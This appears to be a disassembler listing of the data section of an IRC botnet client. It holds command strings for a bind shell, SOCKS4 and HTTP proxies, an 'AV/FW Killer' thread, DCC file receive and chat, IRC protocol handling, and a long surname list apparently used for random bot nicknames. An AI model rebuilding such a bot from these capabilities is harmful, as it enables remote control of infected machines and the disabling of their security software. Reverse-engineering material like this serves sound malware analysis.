dword_42F8D4 dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_40274D+F88�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_40274D+F6D�o
align 10h
dword_42F8F0 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_40274D+F62�o
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_40274D+F47�o
align 4
dword_42F90C dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_40274D+F3C�o
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_40274D+F21�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_40274D+F0C�o
align 4
aSocks4 db 'socks4',0 ; DATA XREF: sub_40274D+EF7�o
align 4
dword_42F934 dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0 ; DATA XREF: sub_40274D+EEC�o
aServer_0 db 'Server',0 ; DATA XREF: sub_40274D+EE7�o
; sub_40274D+F37�o ...
align 10h
aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_40274D+ED1�o
align 10h
aBd db 'bd',0 ; DATA XREF: sub_40274D+EBC�o
align 4
aBindshell db 'bindshell',0 ; DATA XREF: sub_40274D+EA7�o
align 10h
aUnsec db 'unsec',0 ; DATA XREF: sub_40274D+E92�o
align 4
aUnsecure db 'unsecure',0 ; DATA XREF: sub_40274D+E7D�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_40274D+E68�o
; sub_40274D+2B4D�o
aSecure db 'secure',0 ; DATA XREF: sub_40274D+E53�o
; sub_40274D+2B3C�o
align 10h
aSt db 'st',0 ; DATA XREF: sub_40274D+E3E�o
align 4
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_40274D+E29�o
align 10h
aDed db 'ded',0 ; DATA XREF: sub_40274D+E14�o
aDedication db 'dedication',0 ; DATA XREF: sub_40274D+DFF�o
align 10h
aVer db 'ver',0 ; DATA XREF: sub_40274D+DEA�o
aVersion db 'version',0 ; DATA XREF: sub_40274D+DD5�o
aLo db 'lo',0 ; DATA XREF: sub_40274D+DC0�o
align 10h
aLogout db 'logout',0 ; DATA XREF: sub_40274D+DAB�o
align 4
aD_0: ; DATA XREF: sub_40274D+D96�o
; sub_40FDC3+7F�o ...
unicode 0, <d>,0
aDie db 'die',0 ; DATA XREF: sub_40274D+D81�o
aRn db 'rn',0 ; DATA XREF: sub_40274D+D6C�o
align 4
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_40274D+D54�o
a63 db '63',0 ; DATA XREF: sub_40274D+C4D�o
align 10h
asc_42F9E0: ; DATA XREF: sub_40274D+C2E�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_40274D+BFA�o
align 4
aServer db '$server',0 ; DATA XREF: sub_40274D+BEF�o
aRndnick db '$rndnick',0 ; DATA XREF: sub_40274D+BDE�o
align 10h
aChan db '$chan',0 ; DATA XREF: sub_40274D+BC5�o
align 4
aUser db '$user',0 ; DATA XREF: sub_40274D+BB7�o
align 10h
aMe db '$me',0 ; DATA XREF: sub_40274D+BA5�o
aD_1 db '$%d',0 ; DATA XREF: sub_40274D+B43�o
aD db '$%d-',0 ; DATA XREF: sub_40274D+AA5�o
align 10h
asc_42FA20: ; DATA XREF: sub_40274D+9D0�o
; seg002:00442F1C�o ...
unicode 0, <l>,0
unk_42FA24 db 2Dh ; - ; DATA XREF: sub_40274D+995�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0
align 4
unk_42FA58 db 2Dh ; - ; DATA XREF: sub_40274D+984�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatAlreadyAct db '- Chat already active with user: %s.',0
align 4
unk_42FA88 db 2Dh ; - ; DATA XREF: sub_40274D+95E�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_30 db '- Failed to start chat thread, error: <%d>.',0
align 10h
unk_42FAC0 db 2Dh ; - ; DATA XREF: sub_40274D+905�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFromUserS_ db '- Chat from user: %s.',0
align 10h
aChat db 'CHAT',0 ; DATA XREF: sub_40274D+877�o
align 4
unk_42FAE8 db 2Dh ; - ; DATA XREF: sub_40274D+860�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
align 4
dword_42FB2C dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40274D+830�o
dd 0A0Dh
dword_42FB44 dd 4E495001h, 47h ; DATA XREF: sub_40274D+802�o
dword_42FB4C dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40274D+7F7�o
dd 0D017325h, 0Ah
dword_42FB68 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_40274D+7C9�o
dword_42FB74 dd 23h ; DATA XREF: sub_40274D+755�o
; sub_40E916+1B�o
unk_42FB78 db 2Dh ; - ; DATA XREF: sub_40274D+72C�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_31 db '- Failed to start transfer thread, error: <%d>.',0
align 4
unk_42FBB4 db 2Dh ; - ; DATA XREF: sub_40274D+6CF�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0
align 4
aSend_0 db 'SEND',0 ; DATA XREF: sub_40274D+638�o
align 4
dword_42FBEC dd 43434401h, 0 ; DATA XREF: sub_40274D+61D�o
dword_42FBF4 dd 323333h ; DATA XREF: sub_40274D+5BA�o
; sub_40274D+9EC�o ...
unk_42FBF8 db 2Dh ; - ; DATA XREF: sub_40274D+54A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedOut db 'User: %s logged out.',0
align 4
unk_42FC1C db 2Dh ; - ; DATA XREF: sub_40274D+52A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChanne_0 db 'Joined channel: %s.',0
a353 db '353',0 ; DATA XREF: sub_40274D+4F9�o
aQuit db 'QUIT',0 ; DATA XREF: sub_40274D+4C2�o
align 4
aPart db 'PART',0 ; DATA XREF: sub_40274D+4B1�o
; sub_40274D+564�o
align 10h
aSS_1 db ':%s%s',0 ; DATA XREF: sub_40274D+48C�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_40274D+378�o
align 10h
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+322�o
; sub_40274D+585�o
unk_42FC70 db 2Dh ; - ; DATA XREF: sub_40274D+307�o
; sub_40274D+2C92�o ...
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_0 db 'User %s logged out.',0
aKick db 'KICK',0 ; DATA XREF: sub_40274D+2AC�o
align 4
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+263�o
; sub_40274D+7874�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_40274D+23B�o
; sub_41A6AE:loc_41A723�o
a@: ; DATA XREF: sub_40274D+213�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40274D+203�o
a005 db '005',0 ; DATA XREF: sub_40274D+1EE�o
a001 db '001',0 ; DATA XREF: sub_40274D+1D9�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+1BE�o
; sub_40274D+365�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+1A1�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_40274D+18A�o
; sub_41A6AE+4E�o
align 4
asc_42FCDC: ; DATA XREF: sub_40274D+17B�o
; sub_40274D+7981�o
unicode 0, <!>,0
asc_42FCE0: ; DATA XREF: sub_40274D+A9�o
; sub_40274D+D04�o ...
unicode 0, < >,0
asc_42FCE4 db ' :',0 ; DATA XREF: sub_40274D+87�o
; sub_40274D:loc_403191�o
align 4
dword_42FCE8 dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_40A263+452�o
aFailedToSta_32 db '- Failed to start server, error: <%d>.',0
align 4
dword_42FD1C dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_40A263+407�o
aServerRunnin_0 db '- Server running on Port: 113.',0
align 4
unk_42FD48 db 2Dh ; - ; DATA XREF: sub_40A263+3DA�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 4
unk_42FD88 db 2Dh ; - ; DATA XREF: sub_40A263+389�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aAvFwKillerActi db ' AV/FW Killer active.',0
align 4
dword_42FDAC dd 234032Dh, 6E69616Dh, 202D0203h, 20746F42h, 72617473h
; DATA XREF: sub_40A263+34E�o
dd 2E646574h, 0
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_40A263+279�o
align 4
aSS_0 db '%s\%s',0 ; DATA XREF: sub_40A263+182�o
; sub_4185EA+7E�o ...
align 4
aSS db '%s%s',0 ; DATA XREF: sub_40A263+106�o
; sub_412135+4CF�o ...
align 4
aZytowski db 'Zytowski',0 ; DATA XREF: seg002:0043D758�o
align 10h
aZwiers db 'Zwiers',0 ; DATA XREF: seg002:0043D754�o
align 4
aZurn db 'Zurn',0 ; DATA XREF: seg002:0043D750�o
align 10h
aZucconi db 'Zucconi',0 ; DATA XREF: seg002:0043D74C�o
aZoldak db 'Zoldak',0 ; DATA XREF: seg002:0043D748�o
align 10h
aZerbini db 'Zerbini',0 ; DATA XREF: seg002:0043D744�o
aZegans db 'Zegans',0 ; DATA XREF: seg002:0043D740�o
align 10h
aZangwill db 'Zangwill',0 ; DATA XREF: seg002:0043D73C�o
align 4
aZahedi db 'Zahedi',0 ; DATA XREF: seg002:0043D738�o
align 4
aZachary db 'Zachary',0 ; DATA XREF: seg002:0043D734�o
aYu db 'Yu',0 ; DATA XREF: seg002:0043D730�o
align 10h
aYoukSee db 'Youk-See',0 ; DATA XREF: seg002:0043D72C�o
align 4
aYoo db 'Yoo',0 ; DATA XREF: seg002:0043D728�o
aYoffe db 'Yoffe',0 ; DATA XREF: seg002:0043D724�o
align 4
aYetiv db 'Yetiv',0 ; DATA XREF: seg002:0043D720�o
align 10h
aYesson db 'Yesson',0 ; DATA XREF: seg002:0043D71C�o
align 4
aYedidia db 'Yedidia',0 ; DATA XREF: seg002:0043D718�o
aYbarra db 'Ybarra',0 ; DATA XREF: seg002:0043D714�o
align 4
aYates db 'Yates',0 ; DATA XREF: seg002:0043D710�o
align 10h
aYarchuk db 'Yarchuk',0 ; DATA XREF: seg002:0043D70C�o
aYankee db 'Yankee',0 ; DATA XREF: seg002:0043D708�o
align 10h
aYamane db 'Yamane',0 ; DATA XREF: seg002:0043D704�o
align 4
aYacono db 'Yacono',0 ; DATA XREF: seg002:0043D700�o
align 10h
aVotey db 'Votey',0 ; DATA XREF: seg002:0043D6FC�o
align 4
aVorhaus db 'Vorhaus',0 ; DATA XREF: seg002:0043D6F8�o
aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: seg002:0043D6F4�o
align 10h
aWoods db 'Woods',0 ; DATA XREF: seg002:0043D6F0�o
align 4
aWooden db 'Wooden',0 ; DATA XREF: seg002:0043D6EC�o
align 10h
aWoo db 'Woo',0 ; DATA XREF: seg002:0043D6E8�o
aVonhoffman db 'VonHoffman',0 ; DATA XREF: seg002:0043D6E4�o
align 10h
aWolk db 'Wolk',0 ; DATA XREF: seg002:0043D6E0�o
align 4
aVoigt db 'Voigt',0 ; DATA XREF: seg002:0043D6DC�o
align 10h
aViviani db 'Viviani',0 ; DATA XREF: seg002:0043D6D8�o
aVitali db 'Vitali',0 ; DATA XREF: seg002:0043D6D4�o
align 10h
aWilson db 'Wilson',0 ; DATA XREF: seg002:0043D6D0�o
align 4
aWillstatter db 'Willstatter',0 ; DATA XREF: seg002:0043D6CC�o
aVillarreal db 'Villarreal',0 ; DATA XREF: seg002:0043D6C8�o
align 10h
aWilkinson db 'Wilkinson',0 ; DATA XREF: seg002:0043D6C4�o
align 4
aWilkin db 'Wilkin',0 ; DATA XREF: seg002:0043D6C0�o
align 4
aWilk db 'Wilk',0 ; DATA XREF: seg002:0043D6BC�o
align 4
aWilhelm db 'Wilhelm',0 ; DATA XREF: seg002:0043D6B8�o
aWilder db 'Wilder',0 ; DATA XREF: seg002:0043D6B4�o
align 4
aVignola db 'Vignola',0 ; DATA XREF: seg002:0043D6B0�o
aViens db 'Viens',0 ; DATA XREF: seg002:0043D6AC�o
align 4
aWiener db 'Wiener',0 ; DATA XREF: seg002:0043D6A8�o
align 4
aWiedersheim db 'Wiedersheim',0 ; DATA XREF: seg002:0043D6A4�o
aViano db 'Viano',0 ; DATA XREF: seg002:0043D6A0�o
align 4
aViana db 'Viana',0 ; DATA XREF: seg002:0043D69C�o
align 10h
aWhittaker db 'Whittaker',0 ; DATA XREF: seg002:0043D698�o
align 4
aWhitla db 'Whitla',0 ; DATA XREF: seg002:0043D694�o
align 4
aWhite db 'White',0 ; DATA XREF: seg002:0043D690�o
align 4
aWhilton db 'Whilton',0 ; DATA XREF: seg002:0043D68C�o
aWhately db 'Whately',0 ; DATA XREF: seg002:0043D688�o
aWetzel db 'Wetzel',0 ; DATA XREF: seg002:0043D684�o
align 4
aWescott db 'Wescott',0 ; DATA XREF: seg002:0043D680�o
aVerghese db 'Verghese',0 ; DATA XREF: seg002:0043D67C�o
align 4
aVenne db 'Venne',0 ; DATA XREF: seg002:0043D678�o
align 10h
aWengret db 'Wengret',0 ; DATA XREF: seg002:0043D674�o
aWelsh db 'Welsh',0 ; DATA XREF: seg002:0043D670�o
align 10h
aWelles db 'Welles',0 ; DATA XREF: seg002:0043D66C�o
align 4
aVelasquez db 'Velasquez',0 ; DATA XREF: seg002:0043D668�o
align 4
aWeissman db 'Weissman',0 ; DATA XREF: seg002:0043D664�o
align 10h
aWeissbourd db 'Weissbourd',0 ; DATA XREF: seg002:0043D660�o
align 4
aWeinhaus db 'Weinhaus',0 ; DATA XREF: seg002:0043D65C�o
align 4
aWeingarten db 'Weingarten',0 ; DATA XREF: seg002:0043D658�o
; seg002:off_43FE84�o
align 4
aWeighart db 'Weighart',0 ; DATA XREF: seg002:0043D654�o
align 10h
aWaugh db 'Waugh',0 ; DATA XREF: seg002:0043D650�o
align 4
aVasquez db 'Vasquez',0 ; DATA XREF: seg002:0043D64C�o
aWasowska db 'Wasowska',0 ; DATA XREF: seg002:0043D648�o
align 4
aWarshafsky db 'Warshafsky',0 ; DATA XREF: seg002:0043D644�o
; seg001:00432E18�o
align 4
dword_430058 dd 686E6156h ; DATA XREF: seg002:0043D640�o
aEeckeren db 'eeckeren',0 ; DATA XREF: seg002:off_43E4D0�o
align 4
aVandenberg db 'Vandenberg',0 ; DATA XREF: seg002:0043D63C�o
align 4
aVanzwet db 'VanZwet',0 ; DATA XREF: seg002:0043D638�o
aVanallen db 'vanAllen',0 ; DATA XREF: seg002:0043D634�o
align 4
aWalter db 'Walter',0 ; DATA XREF: seg002:0043D630�o
align 10h
aWallenberg db 'Wallenberg',0 ; DATA XREF: seg002:0043D62C�o
align 4
aWales db 'Wales',0 ; DATA XREF: seg002:0043D628�o
align 4
aValencia db 'Valencia',0 ; DATA XREF: seg002:0043D624�o
align 10h
aValberg db 'Valberg',0 ; DATA XREF: seg002:0043D620�o
aWaite db 'Waite',0 ; DATA XREF: seg002:0043D61C�o
align 10h
aVacca db 'Vacca',0 ; DATA XREF: seg002:0043D618�o
align 4
aUzuner db 'Uzuner',0 ; DATA XREF: seg002:0043D614�o
align 10h
aUsdan db 'Usdan',0 ; DATA XREF: seg002:0043D610�o
align 4
aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: seg002:0043D60C�o
align 4
aUrban db 'Urban',0 ; DATA XREF: seg002:0043D608�o
align 10h
aUpsdell db 'Upsdell',0 ; DATA XREF: seg002:0043D604�o
aUntermeyer db 'Untermeyer',0 ; DATA XREF: seg002:0043D600�o
align 4
aUllman db 'Ullman',0 ; DATA XREF: seg002:0043D5FC�o
align 4
aTzamarias db 'Tzamarias',0 ; DATA XREF: seg002:0043D5F8�o
align 4
aTwells db 'Twells',0 ; DATA XREF: seg002:0043D5F4�o
align 10h
aTuttle db 'Tuttle',0 ; DATA XREF: seg002:0043D5F0�o
align 4
aTurek db 'Turek',0 ; DATA XREF: seg002:0043D5EC�o
align 10h
aTurano db 'Turano',0 ; DATA XREF: seg002:0043D5E8�o
align 4
aTukan db 'Tukan',0 ; DATA XREF: seg002:0043D5E4�o
align 10h
aTudge db 'Tudge',0 ; DATA XREF: seg002:0043D5E0�o
align 4
aTuck db 'Tuck',0 ; DATA XREF: seg002:0043D5DC�o
align 10h
aTsukurov db 'Tsukurov',0 ; DATA XREF: seg002:0043D5D8�o
align 4
aTsomides db 'Tsomides',0 ; DATA XREF: seg002:0043D5D4�o
align 4
aTsiatis db 'Tsiatis',0 ; DATA XREF: seg002:0043D5D0�o
aTruss db 'Truss',0 ; DATA XREF: seg002:0043D5CC�o
align 4
aTroy db 'Troy',0 ; DATA XREF: seg002:0043D5C8�o
align 10h
aTroiani db 'Troiani',0 ; DATA XREF: seg002:0043D5C4�o
aTringali db 'Tringali',0 ; DATA XREF: seg002:0043D5C0�o
align 4
aTrewin db 'Trewin',0 ; DATA XREF: seg002:0043D5BC�o
align 4
aTrenga db 'Trenga',0 ; DATA XREF: seg002:0043D5B8�o
align 4
aTraebert db 'Traebert',0 ; DATA XREF: seg002:0043D5B4�o
align 10h
aToye db 'Toye',0 ; DATA XREF: seg002:0043D5B0�o
align 4
aTowler db 'Towler',0 ; DATA XREF: seg002:0043D5AC�o
align 10h
aTorske db 'Torske',0 ; DATA XREF: seg002:0043D5A8�o
align 4
aTorresi db 'Torresi',0 ; DATA XREF: seg002:0043D5A4�o
aTopulos db 'Topulos',0 ; DATA XREF: seg002:0043D5A0�o
aToomer db 'Toomer',0 ; DATA XREF: seg002:0043D59C�o
align 10h
aTomford db 'Tomford',0 ; DATA XREF: seg002:0043D598�o
aTolman db 'Tolman',0 ; DATA XREF: seg002:0043D594�o
align 10h
aTolls db 'Tolls',0 ; DATA XREF: seg002:0043D590�o
align 4
aTollestrup db 'Tollestrup',0 ; DATA XREF: seg002:0043D58C�o
align 4
aTofallis db 'Tofallis',0 ; DATA XREF: seg002:0043D588�o
align 10h
aTimmons db 'Timmons',0 ; DATA XREF: seg002:0043D584�o
aTill db 'Till',0 ; DATA XREF: seg002:0043D580�o
align 10h
aTierney db 'Tierney',0 ; DATA XREF: seg002:0043D57C�o
aThroop db 'Throop',0 ; DATA XREF: seg002:0043D578�o
align 10h
aThomsen db 'Thomsen',0 ; DATA XREF: seg002:0043D574�o
aThisted db 'Thisted',0 ; DATA XREF: seg002:0043D570�o
aThibault db 'Thibault',0 ; DATA XREF: seg002:0043D56C�o
align 4
aTheodos db 'Theodos',0 ; DATA XREF: seg002:0043D568�o
aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: seg002:0043D564�o
align 4
aThan db 'Than',0 ; DATA XREF: seg002:0043D560�o
align 4
aTerracini db 'Terracini',0 ; DATA XREF: seg002:0043D55C�o
align 4
aTenney db 'Tenney',0 ; DATA XREF: seg002:0043D558�o
align 10h
aTemmer db 'Temmer',0 ; DATA XREF: seg002:0043D554�o
align 4
aTemes db 'Temes',0 ; DATA XREF: seg002:0043D550�o
align 10h
aTeague db 'Teague',0 ; DATA XREF: seg002:0043D54C�o
align 4
aTcherepnin db 'Tcherepnin',0 ; DATA XREF: seg002:0043D548�o
align 4
aTawn db 'Tawn',0 ; DATA XREF: seg002:0043D544�o
align 4
aTaveras db 'Taveras',0 ; DATA XREF: seg002:0043D540�o
aTatar db 'Tatar',0 ; DATA XREF: seg002:0043D53C�o
align 4
aTanowitz db 'Tanowitz',0 ; DATA XREF: seg002:0043D538�o
align 4
aTandler db 'Tandler',0 ; DATA XREF: seg002:0043D534�o
aTambiah db 'Tambiah',0 ; DATA XREF: seg002:0043D530�o
aTalaugon db 'Talaugon',0 ; DATA XREF: seg002:0043D52C�o
align 4
aTai db 'Tai',0 ; DATA XREF: seg002:0043D528�o
aTagiuri db 'Tagiuri',0 ; DATA XREF: seg002:0043D524�o
aSwindle db 'Swindle',0 ; DATA XREF: seg002:0043D520�o
aSweetser db 'Sweetser',0 ; DATA XREF: seg002:0043D51C�o
align 4
aSweeting db 'Sweeting',0 ; DATA XREF: seg002:0043D518�o
align 10h
aSurdam db 'Surdam',0 ; DATA XREF: seg002:0043D514�o
align 4
aSuo db 'Suo',0 ; DATA XREF: seg002:0043D510�o
aSumner db 'Sumner',0 ; DATA XREF: seg002:0043D50C�o
align 4
aSullivan db 'Sullivan',0 ; DATA XREF: seg002:0043D508�o
align 10h
aStringer db 'Stringer',0 ; DATA XREF: seg002:0043D504�o
align 4
aStreiff db 'Streiff',0 ; DATA XREF: seg002:0043D500�o
aStrauch db 'Strauch',0 ; DATA XREF: seg002:0043D4FC�o
aStrange db 'Strange',0 ; DATA XREF: seg002:0043D4F8�o
aStott db 'Stott',0 ; DATA XREF: seg002:0043D4F4�o
align 4
aStorer db 'Storer',0 ; DATA XREF: seg002:0043D4F0�o
align 4
aStonich db 'Stonich',0 ; DATA XREF: seg002:0043D4EC�o
aStolzenberg db 'Stolzenberg',0 ; DATA XREF: seg002:0043D4E8�o
aStockwell db 'Stockwell',0 ; DATA XREF: seg002:0043D4E4�o
align 4
aStockton db 'Stockton',0 ; DATA XREF: seg002:0043D4E0�o
align 10h
aStock db 'Stock',0 ; DATA XREF: seg002:0043D4DC�o
align 4
aStillwell db 'Stillwell',0 ; DATA XREF: seg002:0043D4D8�o
align 4
aStiepock db 'Stiepock',0 ; DATA XREF: seg002:0043D4D4�o
align 10h
aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: seg002:0043D4D0�o
align 10h
aStepniewska db 'Stepniewska',0 ; DATA XREF: seg002:0043D4CC�o
aStephanian db 'Stephanian',0 ; DATA XREF: seg002:0043D4C8�o
align 4
aSteiner db 'Steiner',0 ; DATA XREF: seg002:0043D4C4�o
aStefani db 'Stefani',0 ; DATA XREF: seg002:0043D4C0�o
aStatlender db 'Statlender',0 ; DATA XREF: seg002:0043D4BC�o
align 4
aStates db 'States',0 ; DATA XREF: seg002:0043D4B8�o
align 4
aStassinopolus db 'Stassinopolus',0 ; DATA XREF: seg002:0043D4B4�o
align 4
aStang db 'Stang',0 ; DATA XREF: seg002:0043D4B0�o
align 4
aStam db 'Stam',0 ; DATA XREF: seg002:0043D4AC�o
align 4
aStalvey db 'Stalvey',0 ; DATA XREF: seg002:0043D4A8�o
aStmartin db 'StMartin',0 ; DATA XREF: seg002:0043D4A4�o
align 10h
aSpinrad db 'Spinrad',0 ; DATA XREF: seg002:0043D4A0�o
aSpiliotis db 'Spiliotis',0 ; DATA XREF: seg002:0043D49C�o
align 4
aSpiegelhalter db 'Spiegelhalter',0 ; DATA XREF: seg002:0043D498�o
align 4
aSpicer db 'Spicer',0 ; DATA XREF: seg002:0043D494�o
align 4
aSperber db 'Sperber',0 ; DATA XREF: seg002:0043D490�o
aSpence db 'Spence',0 ; DATA XREF: seg002:0043D48C�o
align 4
aSpeizer db 'Speizer',0 ; DATA XREF: seg002:0043D488�o
aSpaulding db 'Spaulding',0 ; DATA XREF: seg002:0043D484�o
align 10h
aSparrow db 'Sparrow',0 ; DATA XREF: seg002:0043D480�o
aSpanier db 'Spanier',0 ; DATA XREF: seg002:0043D47C�o
aSoultanian db 'Soultanian',0 ; DATA XREF: seg002:0043D478�o
align 4
aSoule db 'Soule',0 ; DATA XREF: seg002:0043D474�o
align 4
aSoukup db 'Soukup',0 ; DATA XREF: seg002:0043D470�o
align 4
aSottak db 'Sottak',0 ; DATA XREF: seg002:0043D46C�o
align 4
aSorg db 'Sorg',0 ; DATA XREF: seg002:0043D468�o
align 4
aSorabella db 'Sorabella',0 ; DATA XREF: seg002:0043D464�o
align 4
aSommariva db 'Sommariva',0 ; DATA XREF: seg002:0043D460�o
align 4
aSomers db 'Somers',0 ; DATA XREF: seg002:0043D45C�o
align 4
aSolon db 'Solon',0 ; DATA XREF: seg002:0043D458�o
align 4
aSocolow db 'Socolow',0 ; DATA XREF: seg002:0043D454�o
aSnodgrass db 'Snodgrass',0 ; DATA XREF: seg002:0043D450�o
align 4
aSniffen db 'Sniffen',0 ; DATA XREF: seg002:0043D44C�o
aSmilow db 'Smilow',0 ; DATA XREF: seg002:0043D448�o
align 4
aSlowe db 'Slowe',0 ; DATA XREF: seg002:0043D444�o
align 10h
aSloan db 'Sloan',0 ; DATA XREF: seg002:0043D440�o
align 4
aSkoda db 'Skoda',0 ; DATA XREF: seg002:0043D43C�o
align 10h
aSkerry db 'Skerry',0 ; DATA XREF: seg002:0043D438�o
align 4
aSkane db 'Skane',0 ; DATA XREF: seg002:0043D434�o
align 10h
aSites db 'Sites',0 ; DATA XREF: seg002:0043D430�o
align 4
aSirilli db 'Sirilli',0 ; DATA XREF: seg002:0043D42C�o
aSinsabaugh db 'Sinsabaugh',0 ; DATA XREF: seg002:0043D428�o
align 4
aSilvetti db 'Silvetti',0 ; DATA XREF: seg002:0043D424�o
align 4
aSilverman db 'Silverman',0 ; DATA XREF: seg002:0043D420�o
align 4
aSigna db 'Signa',0 ; DATA XREF: seg002:0043D41C�o
align 4
aSigini db 'Sigini',0 ; DATA XREF: seg002:0043D418�o
align 4
aSigalot db 'Sigalot',0 ; DATA XREF: seg002:0043D414�o
aSiesto db 'Siesto',0 ; DATA XREF: seg002:0043D410�o
align 4
aShimon db 'Shimon',0 ; DATA XREF: seg002:0043D40C�o
align 4
aShibata db 'Shibata',0 ; DATA XREF: seg002:0043D408�o
aShia db 'Shia',0 ; DATA XREF: seg002:0043D404�o
align 4
aShesko db 'Shesko',0 ; DATA XREF: seg002:0043D400�o
align 4
aShepstone db 'Shepstone',0 ; DATA XREF: seg002:0043D3FC�o
align 10h
aSheppard db 'Sheppard',0 ; DATA XREF: seg002:0043D3F8�o
align 4
aShepherd db 'Shepherd',0 ; DATA XREF: seg002:0043D3F4�o
align 4
aSheats db 'Sheats',0 ; DATA XREF: seg002:0043D3F0�o
align 10h
aShea db 'Shea',0 ; DATA XREF: seg002:0043D3EC�o
align 4
aShavelson db 'Shavelson',0 ; DATA XREF: seg002:0043D3E8�o
align 4
aShatrov db 'Shatrov',0 ; DATA XREF: seg002:0043D3E4�o
aShar db 'Shar',0 ; DATA XREF: seg002:0043D3E0�o
align 4
aShanley db 'Shanley',0 ; DATA XREF: seg002:0043D3DC�o
aShankland db 'Shankland',0 ; DATA XREF: seg002:0043D3D8�o
align 4
aShakis db 'Shakis',0 ; DATA XREF: seg002:0043D3D4�o
align 10h
aShaikh db 'Shaikh',0 ; DATA XREF: seg002:0043D3D0�o
align 4
aSeyfert db 'Seyfert',0 ; DATA XREF: seg002:0043D3CC�o
aSexton db 'Sexton',0 ; DATA XREF: seg002:0043D3C8�o
align 4
aSeterdahl db 'Seterdahl',0 ; DATA XREF: seg002:0043D3C4�o
align 4
aSennett db 'Sennett',0 ; DATA XREF: seg002:0043D3C0�o
aSen db 'Sen',0 ; DATA XREF: seg002:0043D3BC�o
aSelvage db 'Selvage',0 ; DATA XREF: seg002:0043D3B8�o
aSekler db 'Sekler',0 ; DATA XREF: seg002:0043D3B4�o
align 10h
aSegal db 'Segal',0 ; DATA XREF: seg002:0043D3B0�o
align 4
aSeeber db 'Seeber',0 ; DATA XREF: seg002:0043D3AC�o
align 10h
aSeaton db 'Seaton',0 ; DATA XREF: seg002:0043D3A8�o
align 4
aScudder db 'Scudder',0 ; DATA XREF: seg002:0043D3A4�o
aScovel db 'Scovel',0 ; DATA XREF: seg002:0043D3A0�o
align 4
aSchwickrath db 'Schwickrath',0 ; DATA XREF: seg002:0043D39C�o
aSchwan db 'Schwan',0 ; DATA XREF: seg002:0043D398�o
align 4
aSchuyler db 'Schuyler',0 ; DATA XREF: seg002:0043D394�o
align 4
aSchutte db 'Schutte',0 ; DATA XREF: seg002:0043D390�o
aSchuman db 'Schuman',0 ; DATA XREF: seg002:0043D38C�o
aSchossberger db 'Schossberger',0 ; DATA XREF: seg002:0043D388�o
align 4
aSchmitt db 'Schmitt',0 ; DATA XREF: seg002:0043D384�o
aSchilling db 'Schilling',0 ; DATA XREF: seg002:0043D380�o
align 4
aSchifini db 'Schifini',0 ; DATA XREF: seg002:0043D37C�o
align 4
aSchiano db 'Schiano',0 ; DATA XREF: seg002:0043D378�o
aScheiner db 'Scheiner',0 ; DATA XREF: seg002:0043D374�o
align 4
aScharlemann db 'Scharlemann',0 ; DATA XREF: seg002:0043D370�o
aScharf db 'Scharf',0 ; DATA XREF: seg002:0043D36C�o
align 10h
aScepan db 'Scepan',0 ; DATA XREF: seg002:0043D368�o
align 4
aScarponi db 'Scarponi',0 ; DATA XREF: seg002:0043D364�o
align 4
aSayied db 'Sayied',0 ; DATA XREF: seg002:0043D360�o
align 4
aSawtell db 'Sawtell',0 ; DATA XREF: seg002:0043D35C�o
aSatterthwaite db 'Satterthwaite',0 ; DATA XREF: seg002:0043D358�o
align 4
aSatta db 'Satta',0 ; DATA XREF: seg002:0043D354�o
align 4
